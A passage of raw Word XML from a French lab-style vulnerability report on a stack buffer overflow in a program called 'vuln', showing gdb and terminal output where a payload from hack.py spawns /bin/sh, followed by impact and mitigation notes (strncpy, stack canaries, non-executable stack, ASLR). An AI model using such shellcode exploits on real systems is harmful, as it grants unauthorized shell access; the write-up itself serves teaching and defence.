        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>�����</w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/shNAAAABBBB0</w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>���</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D304D89" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">process 10834 is executing </w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new program: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/dash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B7727" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error in re-setting breakpoint 1: Function "vuln" not defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B71312" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6375C7" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4F173" w14:textId="5E0AFBBB" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C0622" w14:textId="77777777" w:rsidR="00651269" w:rsidRDefault="00651269" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51753435" w14:textId="3207C6C8" w:rsidR="00651269" w:rsidRDefault="00651269" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous remarquons</w:t>
      </w:r>
      <w:r w:rsidR="00A815D6">
        <w:t xml:space="preserve"> que gdb a remarqué que le programme exécutait un nouveau programme, </w:t>
      </w:r>
      <w:r w:rsidR="00A815D6" w:rsidRPr="00A815D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A815D6" w:rsidRPr="00A815D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A815D6" w:rsidRPr="00A815D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A815D6" w:rsidRPr="00A815D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A815D6">
        <w:t xml:space="preserve"> qui est un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A815D6">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A815D6">
        <w:t xml:space="preserve">. Nous remarquons également que nous nous retrouvons bien au sein d’un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0732">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0732">
        <w:t xml:space="preserve"> et que nous pouvons exécuter les commandes que nous souhaitons. Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0732">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0732">
        <w:t xml:space="preserve"> a donc bien été exécuté. Nous pouvons maintenant quitter ce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0732">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0732">
        <w:t xml:space="preserve"> que nous avons généré ainsi que gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2CB79" w14:textId="77777777" w:rsidR="00AE0732" w:rsidRDefault="00AE0732" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB3A7F7" w14:textId="7EF51015" w:rsidR="00AE0732" w:rsidRDefault="00AE0732" w:rsidP="00AE0732">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous allons maintenant vérifier que no</w:t>
      </w:r>
      <w:r w:rsidR="00161789">
        <w:t>tre exploit fonctionne également en dehors de l’environnement de gdb.</w:t>
      </w:r>
      <w:r w:rsidR="00CB03F9">
        <w:t xml:space="preserve"> Nous lançons le programme avec comme argument notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB03F9">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB03F9">
        <w:t xml:space="preserve"> provenant du script hack.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D17E4E" w14:textId="77777777" w:rsidR="00CB03F9" w:rsidRDefault="00CB03F9" w:rsidP="00CB03F9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D109DA" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B9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A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E73EC0D" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B9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A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> $(python2 hack.py)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033923A" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B9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A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs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1��F1�1��[1��C��C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D9D4D" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B9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A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                            �</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0871D6" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B9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A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>��S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203D092" w14:textId="77777777" w:rsidR="000A3B91" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B91">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   �����/bin/shNAAAABBBB0���</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CA401" w14:textId="076542DD" w:rsidR="00CB03F9" w:rsidRPr="000A3B91" w:rsidRDefault="000A3B91" w:rsidP="000A3B91">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3B91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD5D67" w14:textId="77777777" w:rsidR="00CB03F9" w:rsidRDefault="00CB03F9" w:rsidP="00CB03F9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFE9DF0" w14:textId="44D572BD" w:rsidR="00CB03F9" w:rsidRPr="00A815D6" w:rsidRDefault="000A3B91" w:rsidP="00CB03F9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous remarquons que </w:t>
      </w:r>
      <w:r w:rsidR="00A50A55">
        <w:t xml:space="preserve">le programme exécute de </w:t>
      </w:r>
      <w:r w:rsidR="00544B90">
        <w:t>nouveau</w:t>
      </w:r>
      <w:r w:rsidR="00A50A55">
        <w:t xml:space="preserve"> notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A50A55">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A50A55">
        <w:t xml:space="preserve"> et que nous nous retrouvons </w:t>
      </w:r>
      <w:r w:rsidR="00B03754">
        <w:t>bien</w:t>
      </w:r>
      <w:r w:rsidR="00A50A55">
        <w:t xml:space="preserve"> dans un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A50A55">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A50A55">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550FB8E" w14:textId="7543D641" w:rsidR="00142964" w:rsidRPr="00437531" w:rsidRDefault="00142964" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00437531">
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F78BA" w14:textId="5A81100F" w:rsidR="00F22F74" w:rsidRPr="00437531" w:rsidRDefault="008661D9" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Avec ce</w:t>
      </w:r>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve">tte vulnérabilité, un utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="009F3A3C">
        <w:t xml:space="preserve">du programme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F3A3C">
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve"> pourrait récupérer un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00551B71">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve"> donnant un accès </w:t>
      </w:r>
      <w:r w:rsidR="00DA5C95">
        <w:t xml:space="preserve">non autorisé </w:t>
      </w:r>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r w:rsidR="00F558EA">
        <w:t>la machine sur l</w:t>
      </w:r>
      <w:r w:rsidR="00DA5C95">
        <w:t>aquelle tourne ce programme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B2B47" w14:textId="02CD77F2" w:rsidR="00142964" w:rsidRDefault="00200F18" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00437531">
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB321D" w14:textId="6577EEF9" w:rsidR="00791FEE" w:rsidRDefault="007B3062" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Plutôt</w:t>
      </w:r>
      <w:r w:rsidR="001863B4">
        <w:t xml:space="preserve"> que la fonction </w:t>
      </w:r>
      <w:r w:rsidR="00952F32">
        <w:t xml:space="preserve">vulnérable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001863B4">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00464A86">
        <w:t xml:space="preserve"> le code source d</w:t>
      </w:r>
      <w:r w:rsidR="00FA5EA1">
        <w:t>u programme</w:t>
      </w:r>
      <w:r w:rsidR="00464A86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D5CCE" w:rsidRPr="007D5CCE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA5EA1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA5EA1">
        <w:t xml:space="preserve">devrait utiliser la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA5EA1">
        <w:t>strncpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA5EA1">
        <w:t xml:space="preserve"> qui </w:t>
      </w:r>
      <w:r w:rsidR="007C43F1">
        <w:t xml:space="preserve">rajoute une vérification empêchant les buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C43F1">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D5CCE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53B0D1" w14:textId="77777777" w:rsidR="002974AD" w:rsidRDefault="002974AD" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EF238B" w14:textId="16DEC68D" w:rsidR="00791FEE" w:rsidRPr="00791FEE" w:rsidRDefault="00A64F95" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Certaines </w:t>
      </w:r>
      <w:r w:rsidR="00EC753E">
        <w:t xml:space="preserve">protections de sécurité </w:t>
      </w:r>
      <w:r w:rsidR="00204A39">
        <w:t xml:space="preserve">permettent </w:t>
      </w:r>
      <w:r w:rsidR="00B97B1C">
        <w:t xml:space="preserve">d'éviter la </w:t>
      </w:r>
      <w:r w:rsidR="009C002C">
        <w:t xml:space="preserve">vulnérabilité. </w:t>
      </w:r>
      <w:r w:rsidR="009243AB">
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="00F361E6">
        <w:t>flag à la compilation -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F361E6">
        <w:t>fstack-protector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F361E6">
        <w:t xml:space="preserve"> rajoute des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F361E6">
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F361E6">
        <w:t xml:space="preserve"> empêchant </w:t>
      </w:r>
      <w:r w:rsidR="00840873">
        <w:t xml:space="preserve">le buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E642BD">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E642BD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00787C99">
        <w:t>Ne pas mettre le fla</w:t>
      </w:r>
      <w:r w:rsidR="00B8751C">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00787C99">
        <w:t xml:space="preserve"> -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B8751C">
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B8751C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00961D01">
        <w:t xml:space="preserve">empêche l'exécution </w:t>
      </w:r>
      <w:r w:rsidR="001B09FA">
        <w:t xml:space="preserve">d’un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B09FA">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B09FA">
        <w:t xml:space="preserve"> sur la stack. </w:t>
      </w:r>
      <w:r w:rsidR="007D5C42">
        <w:t xml:space="preserve">Et la </w:t>
      </w:r>
      <w:r w:rsidR="006102E5">
        <w:t xml:space="preserve">protection ASLR </w:t>
      </w:r>
      <w:r w:rsidR="00F26B0D">
        <w:t xml:space="preserve">rend </w:t>
      </w:r>
      <w:r w:rsidR="00422885">
        <w:t>imprédictible</w:t>
      </w:r>
      <w:r w:rsidR="00F26B0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130105">
        <w:t xml:space="preserve">les adresses utilisées par le programme, ce qui </w:t>
      </w:r>
      <w:r w:rsidR="00435DCA">
        <w:t xml:space="preserve">complique </w:t>
      </w:r>
      <w:r w:rsidR="009A33CD">
        <w:t xml:space="preserve">l’attaque sans l'utilisation d’un programme comme GDB. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00791FEE" w:rsidRPr="00791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5546"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8272C1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D611E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ED89466"/>
    <w:lvl w:ilvl="0" w:tplc="9B52365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B8EDD2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CE7D6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94C08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F0A4E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5E4A9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74E82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7EFC2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D8B48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6EB025F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61E2B6E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0BB7580"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDB0F212"/>
    <w:lvl w:ilvl="0" w:tplc="9B52365C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="u"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720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695163">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1204713599">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="269625776">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1583101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64"/>
    <w:rsid w:val="00000767"/>
    <w:rsid w:val="000119E0"/>
    <w:rsid w:val="00016C89"/>
    <w:rsid w:val="00057932"/>
    <w:rsid w:val="0006046C"/>
    <w:rsid w:val="00062DD5"/>
    <w:rsid w:val="00075A3B"/>
    <w:rsid w:val="000A3B91"/>
    <w:rsid w:val="00100AFC"/>
    <w:rsid w:val="00107CC1"/>
    <w:rsid w:val="0011756E"/>
    <w:rsid w:val="00130105"/>
    <w:rsid w:val="00130FE0"/>
    <w:rsid w:val="0013261C"/>
    <w:rsid w:val="00142964"/>
    <w:rsid w:val="00161789"/>
    <w:rsid w:val="001863B4"/>
    <w:rsid w:val="001913F0"/>
    <w:rsid w:val="001B09FA"/>
    <w:rsid w:val="001C4E10"/>
    <w:rsid w:val="001E40E7"/>
    <w:rsid w:val="00200F18"/>
    <w:rsid w:val="00204A39"/>
    <w:rsid w:val="00210BCF"/>
    <w:rsid w:val="002325DF"/>
    <w:rsid w:val="0024346A"/>
    <w:rsid w:val="00244A63"/>
    <w:rsid w:val="00251D0F"/>
    <w:rsid w:val="00281EC2"/>
    <w:rsid w:val="0028765B"/>
    <w:rsid w:val="002974AD"/>
    <w:rsid w:val="003314A8"/>
    <w:rsid w:val="00356981"/>
    <w:rsid w:val="00372115"/>
    <w:rsid w:val="003858BB"/>
    <w:rsid w:val="003A04A0"/>
    <w:rsid w:val="003B35C7"/>
    <w:rsid w:val="003B4231"/>
    <w:rsid w:val="003C6A9C"/>
    <w:rsid w:val="003F35DC"/>
    <w:rsid w:val="00400A6C"/>
    <w:rsid w:val="00422885"/>
    <w:rsid w:val="00427B60"/>
    <w:rsid w:val="004332CF"/>
    <w:rsid w:val="00435DCA"/>
    <w:rsid w:val="00437531"/>
    <w:rsid w:val="004478F0"/>
    <w:rsid w:val="00447AAA"/>
    <w:rsid w:val="00464A86"/>
    <w:rsid w:val="004D217E"/>
    <w:rsid w:val="005266FC"/>
    <w:rsid w:val="00544B90"/>
    <w:rsid w:val="00551B71"/>
    <w:rsid w:val="005629EA"/>
    <w:rsid w:val="00577F07"/>
    <w:rsid w:val="00582E87"/>
    <w:rsid w:val="005B2854"/>
    <w:rsid w:val="005C2DC7"/>
    <w:rsid w:val="005D0F01"/>
    <w:rsid w:val="006102E5"/>
    <w:rsid w:val="00627BBE"/>
    <w:rsid w:val="00642513"/>
    <w:rsid w:val="00651269"/>
    <w:rsid w:val="00662775"/>
    <w:rsid w:val="006C1224"/>
    <w:rsid w:val="006D07AA"/>
    <w:rsid w:val="0073629D"/>
    <w:rsid w:val="00770F13"/>
    <w:rsid w:val="0077160C"/>
    <w:rsid w:val="00774E9A"/>
    <w:rsid w:val="007753FD"/>
    <w:rsid w:val="00787C99"/>
    <w:rsid w:val="00791FEE"/>
    <w:rsid w:val="007B3062"/>
    <w:rsid w:val="007C43F1"/>
    <w:rsid w:val="007D269C"/>
    <w:rsid w:val="007D5C42"/>
    <w:rsid w:val="007D5CCE"/>
    <w:rsid w:val="007D7BF5"/>
    <w:rsid w:val="007E6308"/>
    <w:rsid w:val="00802D00"/>
    <w:rsid w:val="00803693"/>
    <w:rsid w:val="00827127"/>
    <w:rsid w:val="00835118"/>
    <w:rsid w:val="00840174"/>
    <w:rsid w:val="00840873"/>
    <w:rsid w:val="00841C7E"/>
    <w:rsid w:val="008435CA"/>
    <w:rsid w:val="0084416B"/>
    <w:rsid w:val="008568F6"/>
    <w:rsid w:val="008661D9"/>
    <w:rsid w:val="0088194F"/>
    <w:rsid w:val="00885E25"/>
    <w:rsid w:val="00892A86"/>
    <w:rsid w:val="008C7C64"/>
    <w:rsid w:val="008E2400"/>
    <w:rsid w:val="008E333E"/>
    <w:rsid w:val="00905E15"/>
    <w:rsid w:val="00916E4B"/>
    <w:rsid w:val="00923D09"/>
    <w:rsid w:val="009243AB"/>
